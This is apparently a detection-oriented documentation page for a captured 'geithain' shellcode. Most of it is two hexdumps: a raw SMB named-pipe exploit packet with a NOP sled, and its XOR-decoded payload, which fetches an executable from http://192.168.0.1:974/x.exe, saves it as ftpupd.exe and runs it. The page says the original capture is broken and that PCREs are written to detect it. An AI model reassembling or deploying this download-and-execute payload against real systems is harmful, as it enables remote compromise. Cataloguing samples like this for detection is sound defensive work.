geithain Shellcode

The initially captured version of this shellcode is broken. Since it can still be detected, the shellcode has been documented. The PCREs are designed to catch it whether it is broken or not.

file csni:shellcodes:geithain:geithain.bin

Shellcode

raw

hexdump

00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8   .....SMB ........
00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04   ........ ........
00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00   ........ ........
00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02   ........ .T...T..
00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00   ........ ..P.I.P.
00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00   E....... ........
00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00   ........ ........
00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90   ........ ........
00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 58 68 74   ........ .....Xht
00000120: 74 90 90 90 90 90 90 90 - 90 90 90 70 3a 2f 2f 31   t....... ...p...1
00000130: 39 32 2e 31 36 38 2e 30 - 2e 31 3a 39 37 34 2f 78   92.168.0 .1.974.x
00000140: 2e 65 78 65 df df df df - df df df df df df df df   .exe.... ........
00000150: df df df 4d 6f 7a 69 6c - 6c 61 2f 34 2e 30 df 5d   ...Mozil la.4.0..
00000160: 33 c9 66 b9 f1 01 8d 75 - 05 8b fe 8a 06 3c 99 75   3.f....u .......u
00000170: 05 46 8a 06 2c 30 46 34 - 99 88 07 47 e2 ed eb 0a   .F...0F4 ...G....
00000180: e8 da ff ff ff 2e 62 65 - 67 2e 71 93 99 c9 99 c9   ......be g.q.....
00000190: 99 c9 12 fd bd 91 fd 16 - 99 c9 c1 72 68 aa 42 fd   ........ ...rh.B.
000001a0: 66 aa fd 10 ba 14 1c a9 - 98 99 c9 99 c9 c9 f3 98   f....... ........
000001b0: f1 98 99 c9 86 99 c9 71 - c5 98 99 c9 99 c9 90 5f   .......q ........
000001c0: cb 37 92 59 96 1c 78 99 - c9 99 c9 99 c9 14 e4 57   .7.Y..x. .......W
000001d0: 71 7d 99 c9 99 c9 99 c9 - 14 e4 3a 71 45 99 c9 99   q....... ...qE...
000001e0: c9 99 c9 f3 9d f1 99 c9 - 89 99 c9 99 c9 f1 99 c9   ........ ........
000001f0: 99 c9 9c 99 c9 f3 99 c9 - 71 b4 98 99 c9 99 c9 67   ........ q......g
00000200: f3 e3 f0 10 1c d1 98 99 - c9 99 c9 b2 59 c9 c9 f3   ........ ....Y...
00000210: 9b c9 c9 f1 99 c9 99 c9 - 99 c9 d9 14 04 a2 98 99   ........ ........
00000220: c9 99 c9 ca 71 93 98 99 - c9 99 c9 8d 68 61 91 10   ....q... ....ha..
00000230: 1c ae 98 99 c9 99 c9 1a - 61 66 96 1d 11 99 c9 99   ........ af......
00000240: c9 99 c9 b2 50 c8 c8 c8 - f3 98 14 dc 57 c9 71 26   ....P... ....W.q.
00000250: 99 c9 99 c9 99 c9 4e a4 - c0 91 12 49 92 59 ed f7   ......N. ...I.Y..
00000260: b2 59 c9 c9 c9 c9 14 c4 - 3a ca cb 71 3c 99 c9 99   .Y...... ...q....
00000270: c9 99 c9 ff 24 e4 21 92 - 59 ed cf cd cd f1 99 c9   ........ Y.......
00000280: 99 c9 9c 99 c9 66 2c d1 - 98 99 c9 99 c9 c9 71 13   .....f.. ......q.
00000290: 99 c9 99 c9 99 c9 fb b0 - b8 83 c3 cd 12 5d f3 99   ........ ........
000002a0: c9 c9 cb 66 2c d1 98 99 - c9 99 c9 66 2c ae 98 99   ...f.... ...f....
000002b0: c9 99 c9 71 0c 99 c9 99 - c9 99 c9 5a 48 a6 96 c0   ...q.... ...ZH...
000002c0: 66 2c ae 98 99 c9 99 c9 - 71 1c 99 c9 99 c9 99 c9   f....... q.......
000002d0: 4c 29 a7 eb f3 9c 14 04 - a2 98 99 c9 99 c9 ca 71   L....... .......q
000002e0: ea 99 c9 99 c9 99 c9 34 - f4 26 71 f3 99 c9 71 f1   .......4 ..q...q.
000002f0: 99 c9 99 c9 99 c9 f9 3b - 13 ef 29 46 6b 37 5f de   ........ ...Fk7..
00000300: 66 99 c9 5a ec a8 aa b7 - ab f0 99 c9 99 c9 99 c9   f..Z.... ........
00000310: 99 c9 99 c9 b7 c5 ff ed - e9 ec e9 fd b7 fc e1 fc   ........ ........
00000320: 99 c9 99 c9 99 c9 99 c9 - 99 c9 99 c9 99 c9 99 c9   ........ ........
00000330: 99 c9 99 c9 99 c9 99 c9 - 99 c9 ca f5 fc fc e9 99   ........ ........
00000340: c9 f2 fc eb f7 fc f5 aa - ab 99 c9 c7 34 f9 aa 59   ........ ....4..Y
00000350: b4 25 2a 2a 66 c9 ac 93 - 90 81 b7 c9 9c 90 9d 63   ....f... .......c
00000360: 83 c9 cd 71 92 99 c9 99 - c9 99 c9 bf 19 35 51 14   ...q.... .....5Q.
00000370: fd bd 95 0a 72 91 c7 34 - f9 71 c8 99 c9 99 c9 99   ....r..4 .q......
00000380: c9 12 d2 a5 12 d5 80 e1 - 9a 52 aa 6f 14 8d 2a 9a   ........ .R.o....
00000390: c8 b9 12 8b 9a 4a aa 59 - 58 59 9e ab 9b db 19 a3   .....J.Y XY......
000003a0: 99 c9 ec 6c a2 dd bd 85 - ed 9e df a2 e8 81 eb 44   ...l.... .......D
000003b0: 55 12 c8 bd 9a 4a 96 2e - 8d eb 12 d8 85 9a 5a 12   U....J.. ......Z.
000003c0: 9d 09 9a 5a 10 dd bd 85 - f8 10 1c d5 98 99 c9 99   ...Z.... ........
000003d0: c9 66 49 66 7f fd fe 12 - 87 a9 99 c9 12 c2 95 12   .fIf.... ........
000003e0: c2 85 12 82 12 c2 91 5a - b7 fc f7 fd b7 90 90 90   .......Z ........
000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90   ........ .F......
00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90   ........ f.......
00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00   ........ ........
00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00   .....p.. ........
00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00   ........ .p......
000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00   ........ .....p..
000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00   ........ ........
000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00   .p...... ........
000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31   ....x... ....1111
000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31   11111111 11111111
00000cf0: 31 31 31 31 31 31 31 00 - 00                        1111111. .

unxor'd

00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8   .....SMB ........
00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04   ........ ........
00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00   ........ ........
00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02   ........ .T...T..
00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00   ........ ..P.I.P.
00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00   E....... ........
00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00   ........ ........
00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90   ........ ........
00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 58 68 74   ........ .....Xht
00000120: 74 90 90 90 90 90 90 90 - 90 90 90 70 3a 2f 2f 31   t....... ...p...1
00000130: 39 32 2e 31 36 38 2e 30 - 2e 31 3a 39 37 34 2f 78   92.168.0 .1.974.x
00000140: 2e 65 78 65 00 df df df - df df df df df df df df   .exe.... ........
00000150: df df df 4d 6f 7a 69 6c - 6c 61 2f 34 2e 30 00 5d   ...Mozil la.4.0..
00000160: 33 c9 66 b9 f1 01 8d 75 - 05 8b fe 8a 06 3c 99 75   3.f....u .......u
00000170: 05 46 8a 06 2c 30 46 34 - 99 88 07 47 e2 ed eb 0a   .F...0F4 ...G....
00000180: e8 da ff ff ff 2e 62 65 - 67 2e e8 0a 00 00 00 8b   ......be g.......
00000190: 64 24 08 64 8f 00 58 eb - f1 33 db 64 ff 33 64 89   d..d..X. .3.d.3d.
000001a0: 23 8d 85 30 01 00 00 50 - 6a 01 68 01 00 1f 00 e8   ...0...P j.h.....
000001b0: 5c 01 00 00 09 c6 52 ae - 0b c0 0f 85 e1 00 00 00   ......R. ........
000001c0: 8d 7d ce e8 e4 00 00 00 - 8d 7d a3 e8 dc 00 00 00   ........ ........
000001d0: 6a 04 68 00 10 00 00 68 - 00 00 05 00 6a 00 e8 2d   j.h....h ....j...
000001e0: 01 00 00 fe 6a 7a 69 89 - 85 48 01 00 00 2b c0 50   ....jzi. .H.....P
000001f0: 50 6a 02 50 50 68 00 00 - 00 40 8d 9d 3b 01 00 00   Pj.PPh.. ........
00000200: 53 e8 0a 01 00 00 14 f1 - f8 08 89 85 37 01 00 00   S....... ....7...
00000210: 83 f8 ff 0f 84 88 00 00 - 00 2b c9 51 51 51 6a 01   ........ ...QQQj.
00000220: 8d 45 ce 50 e8 bf 00 00 - 00 d7 3d 59 08 8b d0 0b   .E.P.... ...Y....
00000230: c0 74 6e 2b c0 50 50 50 - 50 8d 5d a3 53 52 e8 a5   .tn..PPP P...SR..
00000240: 00 00 00 66 bd 7d b8 0b - c0 74 56 54 54 68 00 00   ...f.... .tVTTh..
00000250: 05 00 ff b5 48 01 00 00 - 50 e8 8a 00 00 00 62 29   ....H... P.....b.
00000260: 21 1a 5a 54 8b c4 6a 00 - 50 52 ff b5 48 01 00 00   ..ZT..j. PR..H...
00000270: ff b5 37 01 00 00 e8 95 - 00 00 00 c3 d1 3f 0f 59   ..7..... .......Y
00000280: ff b5 37 01 00 00 e8 85 - 00 00 00 d5 b0 3e 72 6a   ..7..... ......rj
00000290: 05 8d 9d 3b 01 00 00 53 - e8 73 00 00 00 ad 6d bf   .......S .s....m.
000002a0: e8 6a 00 e8 68 00 00 00 - 60 a2 8a 76 b0 df f2 ae   .j..h... ...v....
000002b0: c6 47 ff 00 c3 75 31 33 - 2e 32 69 00 00 00 00 00   .G...u13 .2i.....
000002c0: 2e 5c 66 74 70 75 70 64 - 2e 65 78 65 00 00 00 00   ..ftpupd .exe....
000002d0: 00 00 00 00 00 00 00 00 - 00 53 6c 65 65 70 00 6b   ........ .Sleep.k
000002e0: 65 72 6e 65 6c 33 32 00 - 5e ad 60 33 c0 2d bc b3   ernel32. ...3....
000002f0: b3 ff 50 35 0a 09 18 2e - 50 05 09 04 fa 1a 50 54   ..P5.... P.....PT
00000300: e8 0b 00 00 00 26 80 ac - c8 8d 64 24 0c 93 eb 08   ........ ..d.....
00000310: 5e ad 60 e8 51 00 00 00 - 8b 4b 3c 8b 4c 19 78 03   ....Q... .K..L.x.
00000320: cb 33 f6 8d 14 b3 03 51 - 20 8b 12 03 d3 33 c0 c1   .3.....Q .....3..
00000330: c0 07 32 02 42 80 3a 00 - 75 f5 3b 44 24 1c 74 07   ..2.B... u..D..t.
00000340: 46 3b 71 18 72 dd cc 8b - 51 24 03 d3 0f b7 14 72   F.q.r... Q......r
00000350: 8b 41 1c 03 c3 8b 04 90 - 03 c3 89 44 24 1c 61 89   .A...... ...D..a.
00000360: 85 4c 01 00 00 ff d0 ff - e6 64 67 8b 1e 30 00 8b   .L...... .dg..0..
00000370: 5b 0c 8b 5b 1c 8b 1b 8b - 5b 08 c3 99 c9 99 c9 99   ........ ........
00000380: c9 12 d2 a5 12 d5 80 e1 - 9a 52 aa 6f 14 8d 2a 9a   ........ .R.o....
00000390: c8 b9 12 8b 9a 4a aa 59 - 58 59 9e ab 9b db 19 a3   .....J.Y XY......
000003a0: 99 c9 ec 6c a2 dd bd 85 - ed 9e df a2 e8 81 eb 44   ...l.... .......D
000003b0: 55 12 c8 bd 9a 4a 96 2e - 8d eb 12 d8 85 9a 5a 12   U....J.. ......Z.
000003c0: 9d 09 9a 5a 10 dd bd 85 - f8 10 1c d5 98 99 c9 99   ...Z.... ........
000003d0: c9 66 49 66 7f fd fe 12 - 87 a9 99 c9 12 c2 95 12   .fIf.... ........
000003e0: c2 85 12 82 12 c2 91 5a - b7 fc f7 fd b7 90 90 90   .......Z ........
000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
